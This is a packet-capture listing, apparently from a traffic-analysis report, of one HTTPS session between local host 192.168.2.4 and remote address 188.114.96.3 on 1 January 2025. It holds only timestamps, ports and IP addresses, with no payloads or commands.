Jan 1, 2025 17:10:04.818830967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.818901062 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.827044010 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.827110052 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.837131023 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.837167978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.837215900 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.837223053 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.837258101 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.837272882 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.837714911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.837780952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.837934017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.837991953 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.838273048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.838308096 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.838342905 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.838349104 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.838377953 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.838396072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.860559940 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.860575914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.860620022 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.860629082 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.860641003 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.860743046 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.861373901 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.861391068 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.861447096 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.861454010 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.861495972 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.863960981 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.863976955 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.864032030 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.864043951 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.864084005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.873528957 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.873545885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.873594999 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.873604059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.873626947 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.873641968 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.906510115 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.906570911 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.907591105 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.907654047 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.907661915 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.907725096 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.910957098 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.911016941 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.911339998 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.911398888 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.919694901 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.919753075 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.928020000 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.928035975 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.928093910 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.928103924 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.928122044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.928159952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.928643942 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.928741932 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.950845003 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.950861931 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.950911045 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.950930119 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.951582909 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.951630116 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.951639891 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.951647043 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.951678038 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.952481985 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.952541113 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.952545881 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.952558994 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.952599049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.954566002 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.954623938 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.960643053 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.960702896 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.963865995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.963927984 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.964021921 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.964076996 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:04.999016047 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:04.999078035 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.017863035 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.017923117 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.018377066 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.018390894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.018448114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.018457890 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.018474102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.018492937 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.019957066 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.019972086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.020020962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.020028114 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.020082951 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.020910025 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.020924091 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.020971060 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.020977974 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.021023035 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.059590101 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.059639931 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.059652090 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.059674978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.059699059 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.059720993 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.060136080 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.060194969 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.060201883 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.060244083 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.060333967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.060394049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.060400963 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.060888052 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.060949087 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.060956001 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.061041117 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.061072111 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.061099052 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.061105967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.061134100 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.061758041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.061829090 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.061836958 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.089519024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.089570045 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.089586973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.089595079 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.089628935 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.108593941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.108660936 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.108685970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.108700037 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.108756065 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.108757019 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.108767986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.108814001 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.108822107 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.108916044 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.108979940 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.108990908 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.110240936 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.110280991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.110305071 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.110311031 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.110348940 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.110562086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.110618114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.110625029 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.149893045 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.149941921 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.149960995 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.149985075 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.150049925 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.150270939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.150330067 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.150341034 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.150346041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.150372028 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.150512934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.150548935 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.150588989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.150597095 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.150609970 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.150895119 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.150969028 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.150969028 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.150978088 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.151025057 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.151076078 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.151129961 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.151170015 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.151228905 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.151798010 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.151854992 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.151861906 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.151866913 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.151915073 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.152055979 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.152105093 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.180068016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.180131912 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.199201107 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.199260950 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.199270010 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.199336052 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.199404955 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.199460983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.199752092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.199768066 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.199814081 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.199820995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.199846983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.200992107 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.201009989 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.201050043 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.201057911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.201086044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.201237917 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.201291084 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.201297998 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241010904 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241027117 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241064072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241071939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241092920 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241105080 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241117954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241131067 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241137981 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241162062 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241162062 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241179943 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241189003 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241194010 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241208076 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241211891 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241255999 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241262913 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241317987 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241508961 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241561890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241760969 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241803885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241811991 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.241816998 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.241852045 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.242119074 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.242161989 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.242180109 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.242186069 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.242253065 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.245601892 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.245656013 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.245661974 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.245666981 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.245701075 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.289565086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.289630890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.289643049 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.289695978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.290107012 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.290127993 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.290183067 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.290193081 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.291194916 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.291208029 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.291260004 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.291268110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.291304111 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.331032991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.331048965 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.331141949 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.331141949 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.331151962 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.331434011 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.331454039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.331470013 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.331475973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.331499100 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.331667900 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.331681967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.331701994 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.331711054 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.331743956 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.331964970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.332001925 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.332007885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.332032919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.332266092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.332308054 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.332345009 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.332350969 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.332381010 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.333074093 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.333111048 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.333117008 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.333151102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.333192110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.333225012 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.333231926 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.333261013 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.337429047 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.380198002 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.380253077 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.380290985 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.380300999 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.380314112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.380337954 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.380354881 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.380393982 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.380403042 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.380434990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.380541086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.380618095 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.380624056 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.380712986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.380798101 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.380805969 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.382071018 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.382119894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.382149935 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.382155895 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.382189035 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.382468939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.382534027 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.382570982 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.382576942 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.382601976 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.382653952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.421869993 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.421979904 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.421991110 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.421998024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.422024012 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.422055006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.422061920 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.422090054 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.422348022 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.422386885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.422419071 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.422430038 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.422450066 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.422496080 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.422530890 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.422601938 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.422636986 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.422642946 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.422672987 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.422736883 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.423032045 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.423082113 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.423118114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.423122883 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.423154116 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.423175097 CET	49733	443	192.168.2.4	188.114.96.3
